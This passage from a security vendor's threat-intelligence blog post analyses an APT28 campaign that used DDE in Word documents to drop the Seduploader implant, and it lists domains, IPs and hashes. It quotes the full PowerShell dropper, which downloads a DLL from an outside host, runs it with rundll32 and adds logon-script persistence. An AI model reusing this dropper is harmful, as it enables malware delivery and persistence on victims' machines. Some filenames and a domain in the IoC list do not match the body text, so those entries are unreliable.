  • Compile date: 2017-10-31 20:11:10
  • Control server: webviewres[.]net

The document downloads a version of the Seduploader first-stage reconnaissance implant, which profiles prospective victims, pulling basic host information from the infected system to the attackers. If the system is of interest, then the installation of X-Agent or Sedreco usually follows.

We have observed APT28 using Seduploader as a first-stage payload for several years from various public reporting. Based on structural code analysis of recent payloads observed in the campaign, we see they are identical to previous Seduploader samples employed by APT28.

We identified the control server domain associated with this activity as webviewres[.]net, which is consistent with past APT28 domain registration techniques that spoof legitimate-sounding infrastructure. This domain was registered on October 25, a few days before the payload and malicious documents were created. The domain was first active on October 29, just days before this version of Seduploader was compiled. The IP currently resolves to 185.216.35.26 and is hosted on the name servers ns1.njal.la and ns2.njal.la.

Further McAfee research identified the following related sample:

  • Filename: secnt.dll
  • Sha1: ab354807e687993fbeb1b325eb6e4ab38d428a1e
  • Compile date: 2017-10-30 23:53:02
  • Control server: satellitedeluxpanorama[.]com. (This domain uses the same name servers as above.)

The preceding sample most likely belongs to the same campaign. Based on our analysis it uses the same techniques and payload. We can clearly establish that the campaign involving documents using DDE techniques began on October 25.

The domain satellitedeluxpanorama[.]com, used by the implant secnt.dll, resolved to 89.34.111.160 as of November 5. The malicious document 68c2809560c7623d2307d8797691abf3eafe319a is responsible for dropping the Seduploader payload (secnt.dll). Its original file name was SaberGuardian2017.docx. This document was created on October 27. The document is distributed from hxxp://sendmevideo[.]org/SaberGuardian2017.docx. The document calls sendmevideo[.]org/dh2025e/eh.dll to download Seduploader (ab354807e687993fbeb1b325eb6e4ab38d428a1e).

The PowerShell command embedded in this document:

$W=New-Object System.Net.WebClient;

$p=($Env:ALLUSERSPROFILE+”\mvdrt.dll”);

[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};

$W.DownloadFile(“http://sendmevideo.org/dh2025e/eh.dll”,$p);

if (Test-Path $p){

$rd_p=$Env:SYSTEMROOT+”\System32\rundll32.exe”;

$p_a=$p+”,#1″;

$pr=Start-Process $rd_p -ArgumentList $p_a;

$p_bat=($Env:ALLUSERSPROFILE+”\mvdrt.bat”);

$text=’set inst_pck = “%ALLUSERSPROFILE%\mvdrt.dll”‘+”`r`n”+’if NOT exist %inst_pck % (exit)’+”`r`n”+’start rundll32.exe %inst_pck %,#1’

[io.File]::WriteAllText($p_bat,$text)

New-Item -Path ‘HKCU:\Environment’ -Force | Out-Null;

New-ItemProperty -Path ‘HKCU:\Environment’ -Name ‘UserInitMprLogonScript’ -Value “$p_bat” -PropertyType String -Force | Out-Null;

}

The file vms.dll, 4bc722a9b0492a50bd86a1341f02c74c0d773db7, is 99% similar-to secnt.dll ab354807e687993fbeb1b325eb6e4ab38d428a1e, indicating the code is almost identical and highly likely to be part of the same campaign. These two DLL implants are likely part of the same campaign. Furthermore, the sample 4bc722a9b0492a50bd86a1341f02c74c0d773db7, based on our code analysis, is 99% similar to the DLL implant 8a68f26d01372114f660e32ac4c9117e5d0577f1, which was used in a campaign spoofing the upcoming cyber conference Cy Con U.S.

The attack techniques in the two campaigns differ: The campaign spoofing the Cy Con U.S conference used document files to execute a malicious VBA script; this campaign using the terrorist theme uses DDE within a document file to execute PowerShell and fetches a remote payload from a distribution site. The payloads, however, are identical for both campaigns.

Conclusion

APT28 is a resourceful threat actor that not only capitalizes on recent events to trick potential victims into infections, but can also rapidly incorporate new exploitation techniques to increase its success. Given the publicity the Cy Con U.S campaign received in the press, it is possible APT28 actors moved away from using the VBA script employed in past actions and chose to incorporate the DDE technique to bypass network defenses. Finally, the use of recent domestic events and a prominent US military exercise focused on deterring Russian aggression highlight APT28’s ability and interest in exploiting geopolitical events for their operations.

Indicators of Compromise

SHA1 Hashes

  • ab354807e687993fbeb1b325eb6e4ab38d428a1e (vms.dll, Seduploader implant)
  • 4bc722a9b0492a50bd86a1341f02c74c0d773db7 (secnt.dll, Seduploader implant)
  • 1c6c700ceebfbe799e115582665105caa03c5c9e (IsisAttackInNewYork.docx)
  • 68c2809560c7623d2307d8797691abf3eafe319a (SaberGuardian.docx)

Domains

  • webviewres[.]net
  • netmediaresources[.]com

IPs

  •  185.216.35.26
  • 89.34.111.160

 McAfee coverage

  •  McAfee products detect this threat as RDN/Generic Downloader.x.

The post Threat Group APT28 Slips Office Malware into Doc Citing NYC Terror Attack appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/apt28-threat-group-adopts-dde-technique-nyc-attack-theme-in-latest-campaign/feed/ 4